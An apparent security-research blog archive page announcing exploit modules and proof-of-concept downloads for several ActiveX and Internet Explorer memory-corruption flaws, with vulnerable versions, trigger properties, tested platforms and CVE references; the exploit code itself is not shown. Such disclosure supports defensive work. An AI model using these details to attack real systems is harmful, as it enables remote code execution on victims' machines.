Recognize-Security

Roxio CinePlayer ActiveX Control Buffer Overflow exploit (meta)

Posted by Trancer on Apr 30 2009

Roxio And another new exploit module for Metasploit.
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to ‘DiskType’, an attacker can overrun a buffer and execute arbitrary code.

This vulnerability was found by Carsten Eiram of Secunia Research back in April 2007. No patch or any kind of solution is offered by the vendor. Also, there was no public exploit for this vulnerability, until now ;-)

Download roxio_cineplayer.rb.
Also on Metasploit.

References:
CVE-2007-1559
BID 23412
OSVDB 34779

Categories: Exploits • Metasploit

0 Comments | Comments RSS | TrackBack URL

Autodesk IDrop ActiveX Control Heap Memory Corruption exploit (meta)

Posted by Trancer on Apr 30 2009

Wrote a new Metaspoit exploit module for the Autodesk IDrop ActiveX control heap-based memory corruption vulnerability.

This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties.

This vulnerability was found by Elazar Board and apparently Autodesk is not going to fix this issue… Better flip on the killbit for this one.

Download autodesk_idrop.rb.
Also on Metasploit.

References:
BID 34352
OSVDB 53265
milw0rm 8560
exploit-database #8560

Categories: Exploits • Metasploit

0 Comments | Comments RSS | TrackBack URL

Microsoft Internet Explorer Object Clone Deletion Memory Corruption (MS09-002) Proof-of-Concept exploit

Posted by Trancer on Feb 24 2009

Here’s a proof-of-concept exploit for Microsoft Internet Explorer Object Clone Deletion Memory Corruption vulnerability in case you don’t use the Metasploit Framework and still want to test it.

Like the Metasploit module I wrote for it, it has been tested successfully on Windows XP SP3, Windows Vista SP1 and Windows Server 2003 SP2 (no 961260 patch).
Update: also tested successfully on Windows Server 2008 with Data Execution Prevention (DEP) OptOut for Internet Explorer (iexplorer.exe).

Download ms09-002.html.

Enjoy it.

Categories: Exploits

0 Comments | Comments RSS | TrackBack URL

Microsoft Internet Explorer Object Clone Deletion Memory Corruption (MS09-002) exploit for Metasploit

Posted by Trancer on Feb 20 2009

Just finish writing a quick Metasploit exploit module for the Microsoft Internet Explorer Object Clone Deletion Memory Corruption vulnerability.

Tested successfully on Windows XP SP3, Windows Vista SP1 and Windows Server 2003 SP2 (without patch 961260 of course).
Update: also tested successfully on Windows Server 2008 with Data Execution Prevention (DEP) OptOut for Internet Explorer (iexplorer.exe).

Download ms09_002_object_delete.rb.

Was a fun one to play with ^_^

References:
MS09-002
CVE-2009-0075
BID 33627
OSVDB 51839
ZDI-09-011

Categories: Exploits • Metasploit

1 Comments | Comments RSS | TrackBack URL

HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow exploit (meta)

Posted by Trancer on Oct 14 2008

Wrote a new Metaspoit exploit module for HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow vulnerability.

This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to ‘ProgColor’, an attacker can overrun a buffer and execute arbitrary code.

Download hpmqc_progcolor.rb.
Also on Metasploit.

References:
CVE-2007-1819
BID 23239
OSVDB 34317
iDefense Labs
HP Security Bulletin

Categories: Exploits • Metasploit

0 Comments | Comments RSS | TrackBack URL

« Newer Posts

Recognize-Security Welcome to the Machine Exploits

Roxio CinePlayer ActiveX Control Buffer Overflow exploit (meta) Posted by Trancer on Apr 30 2009 And another new exploit module for Metasploit. This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to ‘DiskType’, an attacker can overrun a buffer and execute arbitrary code. This vulnerability was found by Carsten Eiram of Secunia Research back in April 2007. No patch or any kind of solution is offered by the vendor. Also, there was no public exploit for this vulnerability, until now ;-) Download roxio_cineplayer.rb. Also on Metasploit. References: CVE-2007-1559 BID 23412 OSVDB 34779 Categories: Exploits • Metasploit 0 Comments \| Comments RSS \| TrackBack URL Autodesk IDrop ActiveX Control Heap Memory Corruption exploit (meta) Posted by Trancer on Apr 30 2009 Wrote a new Metaspoit exploit module for the Autodesk IDrop ActiveX control heap-based memory corruption vulnerability. This module exploits a heap-based memory corruption vulnerability in Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use after free condition using the Src, Background, PackageXml properties. This vulnerability was found by Elazar Board and apparently Autodesk is not going to fix this issue… Better flip on the killbit for this one. Download autodesk_idrop.rb. Also on Metasploit. References: BID 34352 OSVDB 53265 milw0rm 8560 exploit-database #8560 Categories: Exploits • Metasploit 0 Comments \| Comments RSS \| TrackBack URL Microsoft Internet Explorer Object Clone Deletion Memory Corruption (MS09-002) Proof-of-Concept exploit Posted by Trancer on Feb 24 2009 Here’s a proof-of-concept exploit for Microsoft Internet Explorer Object Clone Deletion Memory Corruption vulnerability in case you don’t use the Metasploit Framework and still want to test it. Like the Metasploit module I wrote for it, it has been tested successfully on Windows XP SP3, Windows Vista SP1 and Windows Server 2003 SP2 (no 961260 patch). Update: also tested successfully on Windows Server 2008 with Data Execution Prevention (DEP) OptOut for Internet Explorer (iexplorer.exe). Download ms09-002.html. Enjoy it. Categories: Exploits 0 Comments \| Comments RSS \| TrackBack URL Microsoft Internet Explorer Object Clone Deletion Memory Corruption (MS09-002) exploit for Metasploit Posted by Trancer on Feb 20 2009 Just finish writing a quick Metasploit exploit module for the Microsoft Internet Explorer Object Clone Deletion Memory Corruption vulnerability. Tested successfully on Windows XP SP3, Windows Vista SP1 and Windows Server 2003 SP2 (without patch 961260 of course). Update: also tested successfully on Windows Server 2008 with Data Execution Prevention (DEP) OptOut for Internet Explorer (iexplorer.exe). Download ms09_002_object_delete.rb. Was a fun one to play with ^_^ References: MS09-002 CVE-2009-0075 BID 33627 OSVDB 51839 ZDI-09-011 Categories: Exploits • Metasploit 1 Comments \| Comments RSS \| TrackBack URL HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow exploit (meta) Posted by Trancer on Oct 14 2008 Wrote a new Metaspoit exploit module for HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow vulnerability. This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to ‘ProgColor’, an attacker can overrun a buffer and execute arbitrary code. Download hpmqc_progcolor.rb. Also on Metasploit. References: CVE-2007-1819 BID 23239 OSVDB 34317 iDefense Labs HP Security Bulletin Categories: Exploits • Metasploit 0 Comments \| Comments RSS \| TrackBack URL « Newer Posts	Categories Advisories Articles Exploitation Exploits LOLz Malware Metasploit Presentations Rec-Sec Security News Tools Vulnerabilities Web Application Security Archives September 2010 March 2010 January 2010 December 2009 November 2009 October 2009 September 2009 August 2009 July 2009 June 2009 May 2009 April 2009 March 2009 February 2009 December 2008 November 2008 October 2008 September 2008 August 2008 January 2008 June 2007 May 2007 April 2007 March 2007 February 2007 Pages About Links Aviv Raff BinaryVision BSDeamon Chris Evans DC9723 Didier Stevens Digital Whisper Exploit Database Exploit KB Extraexploit Julien Tinnes Michal Zalewski NiX IRC Network Nmap NullByte Pankaj Kohli Peter Van Eeckhoutte Piotr Bania rgod SkullSecurity Skypher Tavis Ormandy The Metasploit Project TryThis0ne Uninformed xorl eax, eax Yam Mesicka Meta RSS 2.0 ATOM 1.0 RDF 1.0 Links OPML OpenSearch
W3C Unicorn \| Valid XHTML \| Valid CSS \| RSS \| Comments RSS Copyright © 2007 - 2012 Recognize-Security. Some rights reserved. ~~Security~~ Hacking, However, is an art, not a science.